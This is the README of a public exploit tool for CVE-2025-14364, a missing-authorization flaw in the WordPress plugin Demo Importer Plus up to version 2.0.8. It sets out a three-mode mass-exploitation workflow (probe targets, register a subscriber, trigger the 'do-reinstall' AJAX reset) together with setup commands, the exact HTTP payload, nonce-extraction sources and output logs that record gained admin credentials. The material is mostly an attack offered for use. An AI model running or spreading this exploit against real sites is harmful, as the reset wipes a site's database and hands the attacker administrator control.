Exploit for CVE-2025-14364

## https://sploitus.com/exploit?id=EA43A806-33AC-5986-AFF4-9184BC25229B
# CVE-2025-14364
Demo Importer Plus <= 2.0.8 - Missing Authorization to Authenticated (Subscriber+) Site Reset and Privilege Escalation

# CVE-2025-14364 — Demo Importer Plus · Full Site Reset → Privilege Escalation

```
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   /_ \_/ /_  _)    |   |  _) |_)  |
```

> **Authenticated Subscriber → Administrator via `do-reinstall` AJAX action**

---

![CVE](https://img.shields.io/badge/CVE-2025--14364-red?style=flat-square)
![CVSS](https://img.shields.io/badge/CVSS-8.8%20HIGH-orange?style=flat-square)
![Plugin](https://img.shields.io/badge/Plugin-Demo%20Importer%20Plus%20%E2%89%A4%202.0.8-blueviolet?style=flat-square)
![Auth](https://img.shields.io/badge/Auth-Subscriber%2B-yellow?style=flat-square)
![Python](https://img.shields.io/badge/Python-3.10%2B-blue?style=flat-square&logo=python)
![Platform](https://img.shields.io/badge/WordPress-21759B?style=flat-square&logo=wordpress)
![Author](https://img.shields.io/badge/By-Nxploited-brightgreen?style=flat-square)

---

## 〔 1 〕 Vulnerability

| | |
|---|---|
| **CVE** | CVE-2025-14364 |
| **CVSS v3.1** | **8.8 HIGH** — `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Plugin** | Demo Importer Plus |
| **Affected** | All versions ≤ **2.0.8** |
| **Auth needed** | Subscriber (lowest registered role) |
| **Type** | Missing Capability Check → Full Site Reset → Privilege Escalation |
| **CWE** | CWE-862 · Missing Authorization |

**Root Cause:**  
`Ajax::handle_request()` registers the `demo_importer_plus` AJAX action without calling `current_user_can()`. Any authenticated subscriber can send `{"demo_action":"do-reinstall"}` to trigger `wp_install()`, which drops all database tables (except `users` / `usermeta`) and re-runs WordPress setup — automatically assigning the **Administrator role** to the attacking account in the process.

---

## 〔 2 〕 Attack Flow

```
Mode 1 — Diagnose
  Probe: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Identify live WordPress targets

Mode 2 — Register
  POST /wp-login.php?action=register
  → Create subscriber account
  → Activation email sent to inbox
     ↳ You MUST click the email link before running Mode 3

Mode 3 — Exploit
  POST /wp-login.php                         → Authenticate as subscriber
  GET  /wp-admin/                            → Extract wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → Trigger full site reset
  ← Response: "Site has been reset successfully"
  → Attacking account now holds Administrator role
```

---

## 〔 3 〕 Setup

```bash
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py
```

**`requirements.txt`**
```
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0
```

---

## 〔 4 〕 Usage

```
Mode [1/2/3]:           1 = Diagnose   2 = Register   3 = Exploit
Targets file:           list.txt  (one host per line)
Concurrency:            default 30, max 200
Timeout:                default 10s
```

**Targets format — `list.txt`:**
```
https://target1.com
target2.com
http://target3.com
```

### ► Mode 1 · Diagnose

Probes four endpoints per host and writes clean results.

```bash
Mode: 1
```

Output → `diagnostics_results.txt` · `passed_targets.txt`

---

### ► Mode 2 · Register

```bash
Mode: 2
Email:    attacker@example.com
Username: Nxploited
Password: NxploitedSA
```

> Check your inbox and **click the activation link** before running Mode 3.

Output → `register_results.txt`

---

### ► Mode 3 · Exploit

```bash
Mode: 3
Username: Nxploited
Password: NxploitedSA
```

On success the tool prints:

```
[HH:MM:SS] SUCCESS  "success":true,"message":"Site has been reset successfully" -> https://target.com
```

And writes to `exploit_results.txt`:

```
https://target.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin
```

---

## 〔 5 〕 Output Files

| File | Contents |
|---|---|
| `diagnostics_results.txt` | Full probe JSON per target |
| `passed_targets.txt` | Clean targets (no errors detected) |
| `register_results.txt` | Registration attempt records |
| `exploit_results.txt` | Login · nonce · reset results · confirmed admin hits |
| `reset_results.txt` | Raw `do-reinstall` response per target |

---

## 〔 6 〕 Technical Detail

**Vulnerable request:**

```http
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: 

{"demo_action":"do-reinstall"}
```

**Successful response:**
```json
{"success": true, "data": {"message": "Site has been reset successfully"}}
```

**Nonce extraction — two fallback sources:**
```
wpApiSettings.nonce              (from /wp-admin/ page source)
elementorOneSettingsData.wpRestNonce   (fallback)
```

---

## 〔 7 〕 Author & Contact

```
By   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited
```

[![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited)
[![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited)

---

## 〔 8 〕 Disclaimer

```
THIS SOFTWARE IS RELEASED STRICTLY FOR SECURITY RESEARCH AND EDUCATION.

The author bears zero responsibility for any actions taken with this tool
against systems the operator does not own or have explicit written
authorization to test.

Unauthorized use against third-party systems violates computer crime laws
in most jurisdictions (CFAA, CMA, and equivalents worldwide) and may result
in criminal prosecution.

You alone are responsible for ensuring you have lawful permission
before running this tool against any target.
```

---


© 2025 Nxploited · Security Research Only · Demo Importer Plus ≤ 2.0.8 · Fixed in 2.0.9